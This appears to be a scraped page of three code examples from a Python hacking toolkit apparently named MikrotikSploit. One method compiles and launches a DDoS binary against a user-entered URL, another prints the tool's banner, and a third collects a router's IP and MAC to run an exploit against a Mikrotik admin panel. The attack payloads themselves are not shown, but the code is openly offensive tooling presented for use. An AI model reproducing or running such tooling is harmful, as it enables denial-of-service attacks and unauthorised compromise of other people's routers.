Example #1
0
    def DDos(self):

        CLEAR()

        print(self._S_[1])

        url = input(f"{W}[{P} * {W}]{B} Enter the URL For DoDs{N}: ")

        url = URL_CLEAR(url=url)

        write(f"{WOW}WHITE .................{N}", 10)

        os.system("gcc -s ./core/DDoS/DDoS.c -o ./core/DDoS/DDoS")

        try:

            " %s " % os.system(f"./core/DDoS/DDoS {url} {80}")

        except OSError:
            open("./logs/logs.txt",
                 "a").write(f"\n{timeS()}"
                            f" DDoS for Your NetWork\n{timeS()} Error "
                            f"Url={url} Port={80}")
Example #2
0
    def run1(self):
        self.YE = write(
            f"""
            {B}4D 69 6B 72 6F 74 69 {N}
    {R}.  . .         ,  .   __.   .     , 
    {W}|\/|*;_/._. _ -+-*;_/(__ ._ | _ *-+-
    \033[30m|  ||| \[  (_) | || \.__)[_)|(_)| | 
                             |          {N}
            {B}6B 53 70 6C 6F 69 74 {N}
                        {F2}Version: 0.1{N}
    {T}@ Author => http://FB.com/mhm.hack

        """, 1)

        return self.YE
Example #3
0
    def ExploitBox(self):
        global adders, macks

        try:
            adders, macks = MAC().soRun()

        except:
            self.find = False

            open("./logs/logs.txt", "a").write(
                f"\n{timeS()}"
                f" Error Exploit Mikrotik Admin Panel\n{timeS()} Error "
                f"IP=? MACK=?")

            sys.exit(2)

        if self.find is True:
            asc1 = input(
                f"{W}[{P} * {W}]{B} IP Address Your Router {adders} {W}[{P}y{W}/{R}n{W}]{N}:"
            ).upper()

            if asc1 == "N":
                self.find1 = False
            else:
                adders = adders

        if self.find1 is False:
            if self.find is False:
                adders = input(f"{W}[{R} - {W}]{B} Enter Your IP Router{N}: ")
            else:
                adders = input(f"{W}[{R} - {W}]{B} Enter Your IP Router{N}: ")

            # End IP Address

        if self.find is True:
            asc2 = input(
                f"{W}[{P} * {W}]{B} MAC Address Your Router {macks} {W}[{P}y{W}/{R}n{W}]{N}:"
            ).upper()

            if asc2 == "N":
                self.find2 = False
            else:
                macks = macks

        if self.find2 is False:
            if self.find is False:
                macks = input(f"{W}[{R} - {W}]{B} Enter Your MAC Router{N}: ")
            else:
                macks = input(f"{W}[{R} - {W}]{B} Enter Your MAC Router{N}: ")

            # End MAC Router

        try:
            write(f"\n\n{WOW}Exploiting .................{N}", 10)

            run = RUN().soRun2(macks)

            print(run)

        except TimeoutError:

            print(
                f"{W}[{R} - {W}]{B} Sorry Not Find Exploit For Your Router {N}"
            )